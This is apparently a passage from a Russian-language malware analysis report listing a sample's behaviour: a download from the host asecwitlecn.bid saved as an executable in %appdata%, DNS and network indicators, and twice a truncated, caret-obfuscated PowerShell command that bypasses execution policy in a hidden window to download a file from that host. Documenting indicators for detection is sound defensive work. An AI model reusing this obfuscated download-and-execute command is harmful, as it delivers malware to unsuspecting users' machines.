Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^WerSheL^L^.^E^xe -E^Xe^cu^tionPo^liCY B^YPa^S^s^ -^n^O^PROFiLe -WI^NDOwSt^Yle hidDEn (n^E^w^-ObJect ^SY^Stem.NeT.WEB^c^LIe^Nt)^.do^wN^lO^aDfi^lE^('http://asecwitlecn.bid/read.ph...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "p^O^WerSheL^L^.^E^xe -E^Xe^cu^tionPo^liCY B^YPa^S^s^ -^n^O^PROFiLe -WI^NDOwSt^Yle hidDEn (n^E^w^-ObJect ^SY^Stem.NeT.WEB^c^LIe^Nt)^.do^wN^lO^aDfi^lE^('http://asecwitlecn.bid/read.ph...' (со скрытым окном)